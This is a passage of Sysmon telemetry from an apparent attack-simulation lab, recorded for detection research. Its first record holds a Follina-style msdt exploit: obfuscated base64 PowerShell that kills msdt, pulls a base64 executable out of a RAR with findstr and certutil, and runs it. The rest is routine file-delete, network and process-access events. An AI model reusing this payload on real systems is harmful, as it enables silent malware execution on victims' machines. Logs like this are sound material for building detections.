IT_BrowseForFile=h$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JGNtZCA9ICJjOlx3aW5kb3dzXHN5c3RlbTMyXGNtZC5leGUiO1N0YXJ0LVByb2Nlc3MgJGNtZCAtd2luZG93c3R5bGUgaGlkZGVuIC1Bcmd1bWVudExpc3QgIi9jIHRhc2traWxsIC9mIC9pbSBtc2R0LmV4ZSI7U3RhcnQtUHJvY2VzcyAkY21kIC13aW5kb3dzdHlsZSBoaWRkZW4gLUFyZ3VtZW50TGlzdCAiL2MgY2QgQzpcdXNlcnNccHVibGljXCYmZm9yIC9yICV0ZW1wJSAlaSBpbiAoMDUtMjAyMi0wNDM4LnJhcikgZG8gY29weSAlaSAxLnJhciAveSYmZmluZHN0ciBUVk5EUmdBQUFBIDEucmFyPjEudCYmY2VydHV0aWwgLWRlY29kZSAxLnQgMS5jICYmZXhwYW5kIDEuYyAtRjoqIC4mJnJnYi5leGUiOw=='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO" | CurrentDirectory=C:\Program Files\ansible\sysmon\ | User=ATTACKRANGE\Administrator | LogonGuid={326FD73D-A440-6294-2753-0E0000000000} | LogonId=0xe5327 | TerminalSessionId=2 | IntegrityLevel=High | Hashes=MD5=BB98CE2BD520AC69CB3D2F830974CABE,SHA256=C1237BDD2B574C1CBBB4A0D990773BBED5B6FE3BD14F8011C0E79F9CDDCA2B4E,IMPHASH=5D314604CE5F7FF83060B18832AA0D35 | ParentProcessGuid={326FD73D-AAC7-6294-6108-000000005502} | ParentProcessId=5488 | ParentImage=C:\Windows\System32\cmd.exe | ParentCommandLine="cmd.exe" /s /k pushd "C:\Program Files\ansible\sysmon"
EventRecordID=100357 | EventID=23 (FileDelete) | UtcTime=2022-05-30 13:06:05.388 | TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational | Hashes=MD5=86D5AEEB56CBBC28008DAD33F1B5B4BD,SHA256=CC7D23BDB7C174A127C43CD8377852365A7802F0A9DAC3C4E2F29D15577F797A,IMPHASH=00000000000000000000000000000000
EventRecordID=100432 | EventID=23 (FileDelete) | UtcTime=2022-05-30 13:06:06.513 | TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational | Hashes=MD5=DE4A30A82BE721733C48307232E7BF72,SHA256=3CDD0F925E801DE63D3DD02CE0CA135C4DF812E3E47480C48C239889A8C92DBD,IMPHASH=00000000000000000000000000000000
EventRecordID=100431 | EventID=23 (FileDelete) | UtcTime=2022-05-30 13:06:06.138 | TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational | Hashes=MD5=682A635C7A60B72DD6012EF6D316E261,SHA256=E2CCAB4279BF974454E37335231FA565EE9F06992079E47F5C152C4D0CA49527,IMPHASH=00000000000000000000000000000000
EventRecordID=100435 | EventID=23 (FileDelete) | UtcTime=2022-05-30 13:06:07.607 | TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational | Hashes=MD5=6D3E9815AA74AEC835C001F39159D84F,SHA256=ACA667C8CD98853B1A5AB1F85CED54BDFEEA81424E8FB3FE706B0F9AD66E6312,IMPHASH=00000000000000000000000000000000
EventRecordID=100434 | EventID=23 (FileDelete) | UtcTime=2022-05-30 13:06:07.028 | TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security | Hashes=MD5=52A969F99A03D24CA6B7C1A26004FA04,SHA256=D4BC2F8148AC761A24822DC5126188BEB984EBE5FA96D87C704655172947D127,IMPHASH=00000000000000000000000000000000
EventRecordID=100433 | EventID=3 (NetworkConnect) | UtcTime=2022-05-30 13:06:02.988 | ProcessGuid={326FD73D-A455-6294-3701-000000005502} | ProcessId=6180 | Image=C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe | User=NT AUTHORITY\SYSTEM | Protocol=tcp | Initiated=true | SourceIsIpv6=false | SourceIp=10.0.1.14 | SourceHostname=win-dc-ctus-attack-range-994.attackrange.local | SourcePort=53353 | SourcePortName=- | DestinationIsIpv6=false | DestinationIp=10.0.1.12 | DestinationHostname=- | DestinationPort=8000 | DestinationPortName=-
EventRecordID=100445 | EventID=23 (FileDelete) | UtcTime=2022-05-30 13:06:08.700 | TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational | Hashes=MD5=C3059315A02E3840301204140135C286,SHA256=7071695C8DB611777A2F9FB72FB5743622CC5B23A74173A18D9BDA1F7DD5E4A3,IMPHASH=00000000000000000000000000000000
EventRecordID=100444 | EventID=7 (ImageLoad) | UtcTime=2022-05-30 13:06:08.294 | ImageLoaded=C:\Windows\System32\msxml6.dll | FileVersion=6.30.14393.5006 | Description=MSXML 6.0 | Product=Microsoft XML Core Services | OriginalFileName=MSXML6.dll | Hashes=MD5=713974F49A72B2239989F2C671747CC0,SHA256=52333BF669EBBFFD2E3169AC2F718D4A106A87D73DE74C07E7E824651FDDAFA7,IMPHASH=FCAD6732873DA041FB25E83E799A2652
EventRecordID=100443 | EventID=7 (ImageLoad) | UtcTime=2022-05-30 13:06:08.294 | ImageLoaded=C:\Windows\System32\clbcatq.dll | FileVersion=2001.12.10941.16384 (rs1_release.210107-1130) | Description=COM+ Configuration Catalog | OriginalFileName=CLBCATQ.DLL | Hashes=MD5=A82FB68F785E73141F5ABC91850595A8,SHA256=416DE0DA209CDCBE9B5D1A868CE972F8FE3399FF62E84EFD46D6FD49BDF7B7B2,IMPHASH=0BE8D1F061DD646F6D2B834CB7C9C900
EventRecordID=100442 | EventID=10 (ProcessAccess) | UtcTime=2022-05-30 13:06:08.294 | SourceProcessGUID={326FD73D-A441-6294-EB00-000000005502} | SourceProcessId=4800 | SourceThreadId=7160 | SourceImage=C:\Windows\Explorer.EXE | TargetProcessGUID={326FD73D-AAC7-6294-6108-000000005502} | TargetProcessId=5488 | TargetImage=C:\Windows\system32\cmd.exe | GrantedAccess=0x1410 | CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+e9b5f|C:\Windows\System32\SHELL32.dll+eb6a5|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bf3f|C:\Windows\System32\windows.storage.dll+13accb|C:\Windows\System32\windows.storage.dll+1391ef|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791
EventRecordID=100441 | EventID=10 (ProcessAccess) | UtcTime=2022-05-30 13:06:08.294 | SourceProcessGUID={326FD73D-A441-6294-EB00-000000005502} | SourceProcessId=4800 | SourceThreadId=7160 | SourceImage=C:\Windows\Explorer.EXE | TargetProcessGUID={326FD73D-AAC7-6294-6108-000000005502} | TargetProcessId=5488 | TargetImage=C:\Windows\system32\cmd.exe | GrantedAccess=0x1000 | CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+eb5be|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bf3f|C:\Windows\System32\windows.storage.dll+13accb|C:\Windows\System32\windows.storage.dll+1391ef|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791
EventRecordID=100440 | EventID=10 (ProcessAccess) | UtcTime=2022-05-30 13:06:08.294 | SourceProcessGUID={326FD73D-A441-6294-EB00-000000005502} | SourceProcessId=4800 | SourceThreadId=7160 | SourceImage=C:\Windows\Explorer.EXE | TargetProcessGUID={326FD73D-AAC7-6294-6108-000000005502} | TargetProcessId=5488 | TargetImage=C:\Windows\system32\cmd.exe | GrantedAccess=0x1000 | CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+e9db4|C:\Windows\System32\SHELL32.dll+eb587|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bf3f|C:\Windows\System32\windows.storage.dll+13accb|C:\Windows\System32\windows.storage.dll+1391ef|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791
10341000x8000000000000000100439Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:06:08.294{326FD73D-A441-6294-EB00-000000005502}48004500C:\Windows\Explorer.EXE{326FD73D-AAC7-6294-6208-000000005502}5940C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+e9b5f|C:\Windows\System32\SHELL32.dll+ebd30|C:\Windows\System32\TwinUI.dll+100021|C:\Windows\System32\TwinUI.dll+10088f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100438Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:08.294{326FD73D-A441-6294-EB00-000000005502}48004500C:\Windows\Explorer.EXE{326FD73D-AAC7-6294-6208-000000005502}5940C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+81330|C:\Windows\System32\SHELL32.dll+ebcec|C:\Windows\System32\TwinUI.dll+100021|C:\Windows\System32\TwinUI.dll+10088f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100437Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:08.294{326FD73D-A441-6294-EB00-000000005502}48004500C:\Windows\Explorer.EXE{326FD73D-AAC7-6294-6208-000000005502}5940C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+e9db4|C:\Windows\System32\SHELL32.dll+ebcc0|C:\Windows\System32\TwinUI.dll+100021|C:\Windows\System32\TwinUI.dll+10088f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100436Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:06:08.294{326FD73D-A441-6294-EB00-000000005502}48004500C:\Windows\Explorer.EXE{326FD73D-AAC7-6294-6208-000000005502}5940C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+ffe59|C:\Windows\System32\TwinUI.dll+10088f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000100446Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:09.794{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8FEEFE5D46D93EF9A6C04E7AF63A885A,SHA256=68EDE7FCDA87C83A18B855AE52CD716673A6C13A576E8642303404F2A11EE2DB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100447Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:10.888{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=65F94AB00F9FB93B02C7CC39E3A815C0,SHA256=F8738B6813E026A9571D00AB00EA8552CD5A096D4B699345262BDD13B4D1D75D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100449Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:11.982{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=566CF10003AF94F825287C2B8329C241,SHA256=6319775FA9C4C1071CFF329FBCC2BF14B05B509DA9E99553803B12DAF64000F5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x8000000000000000100448Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:08.034{326FD73D-A455-6294-3701-000000005502}6180C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53354-false10.0.1.12-8000- 23542300x8000000000000000100450Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:13.075{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A453E26E87E0E1238D89E8CEA99CEC83,SHA256=1770D7107132B53C0E35A2BAF72518433A1D34180D1FECA385831AFF9988C0EA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100451Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:14.169{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D31AE85BD18980B36D92BC4412219C2A,SHA256=F8933211ACBAA1FCD47E497A5E69A15112306BD72E69164613FFD4E5F9A05E02,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100452Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:15.263{326FD73D-A45C-6294-5601-000000005502}6368NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=917F5B4C2B5F13DBA5038F4026BA67ED,SHA256=DDFFC5E18647ABD971F9DB8176E8F324B8948ABB1243F160AE372EAED4E744EF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100453Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:16.356{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2DCF21D6EF8B9150AF0EBB7A7EFD724F,SHA256=1F4E9C77B963E244D739053B8C44FB795B0C39FC9DABDD785896F77B234DFD75,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100454Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:17.450{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2CB748103F5DC223EB28C1D91080B5A0,SHA256=F015A959B0BAC23B121E4D8F1C831D2FE7A39D7BC74E248C1FFA9823F68824C8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100457Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:18.544{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A93277C2E13CDD0AA67B281D6826C7B0,SHA256=D320EBAD7B4E30230C45FD2CF4B0FBB527B1154200014949838C369565184761,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x8000000000000000100456Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:14.065{326FD73D-A455-6294-3701-000000005502}6180C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53355-false10.0.1.12-8000- 23542300x8000000000000000100455Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:18.169{326FD73D-A44C-6294-0501-000000005502}5164NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=0B1622EC8744996986865678E623934B,SHA256=C72B8B880641806B11E3E04732987E1A22933D291E9CE385679267D1E257FFC8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100459Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:19.638{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9610342072BF7AEEB7022D7325C91486,SHA256=63BED5FA93252E7FD2886F61FEE416739D70E1E59C9AAEAA4C38C4F712AA4709,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100458Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:19.091{326FD73D-A254-6294-1100-000000005502}104NT AUTHORITY\LOCAL 
SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=48833C332CD1549A3FB8D8B8DBFB1FDB,SHA256=9B9E3EDD0DA998DD9FC501D1026A02A04D03451806A85FEB93B9B8F1C04A0A1B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100460Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:20.731{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F32BB2B52C9858777D6957099968A62B,SHA256=D31E658D81A651E70F2CD5BAA7EE94B0BC6686A8B0EE4C1CEB4C7928A973E5F3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100461Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:21.825{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F9964AE6C1BF5CD75856DA2F2527E3DE,SHA256=281B1231BCAE1B93214AAAC93FB11AA5BDE27F7EAEF2F3CD51CF9597801E4B58,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100462Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:22.919{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F4F374D9AEAD40E1A418775518790973,SHA256=F73C38F1CCB442917A3A412C5EDD8696E1931E502EF6E76A5C7B416629B27D69,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
23542300x8000000000000000100464Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:23.685{326FD73D-A44C-6294-0501-000000005502}5164NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=B815FDBF3105A0143C61AE82F95AAF1E,SHA256=95D93950BC72E3B7DDB3127D4556C8DC830B74A59CF059DD284FB46B71551B09,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x8000000000000000100463Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:19.115{326FD73D-A455-6294-3701-000000005502}6180C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53356-false10.0.1.12-8000- 23542300x8000000000000000100465Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:24.013{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=369A9DA304EDC871D60DDC1176AE9570,SHA256=EA0FC15747D271AECA699A764B71E0307192C57B117850174C249CAD1E1CFE7B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x8000000000000000100467Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:21.596{326FD73D-A44C-6294-0501-000000005502}5164C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53357-false10.0.1.12-8089- 23542300x8000000000000000100466Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:25.106{326FD73D-A45C-6294-5601-000000005502}6368NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EA41CC774646FAE40AA3F6CE2EE1A9D1,SHA256=91EDAC83A9D6BAACAE516F32C96E6BF6CA40D9369328D6DC1599ACE6EEEA2855,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100468Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:26.200{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BC420AB66FA34A764D1B637DA62212BB,SHA256=C94A698DD439BED5C79EA270496321CFFAA25819F4C872ABC05EEE9A2536037D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100469Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:27.294{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3477A5C8E52E6B4374A87A24FDF7C5B7,SHA256=4DD1CFB357EDAB5DBDF35441793912B782EF9ABE6915817F106553B4970D8A9F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100470Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:28.388{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EA481D6F63513D7B29AD689F2739F81C,SHA256=19281A11160CD512F34FA2AA896C67D53BF4771039026DBA0FA1069418E159D8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100474Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:29.481{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=453429F6341C437B998FB4C370A19696,SHA256=5909D3E972DE567BBB6B8FF7C66719BB51779A555BB4403B67B4DBAF34B465CA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x8000000000000000100473Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:25.096{326FD73D-A455-6294-3701-000000005502}6180C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53358-false10.0.1.12-8000- 354300x8000000000000000100472Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:25.022{326FD73D-A251-6294-0100-000000005502}4SystemNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.255-138netbios-dgmfalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local138netbios-dgm 354300x8000000000000000100471Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:25.022{326FD73D-A251-6294-0100-000000005502}4SystemNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local138netbios-dgmfalse10.0.1.255-138netbios-dgm 23542300x8000000000000000100475Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:06:30.575{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=52940039EECCDF0171C3051C2F2E3A52,SHA256=B4BF80AC80EC75656811CAF6CAA28483DBC1762FEE81A3EFE3E754FE9A3ED27C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100476Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:31.669{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 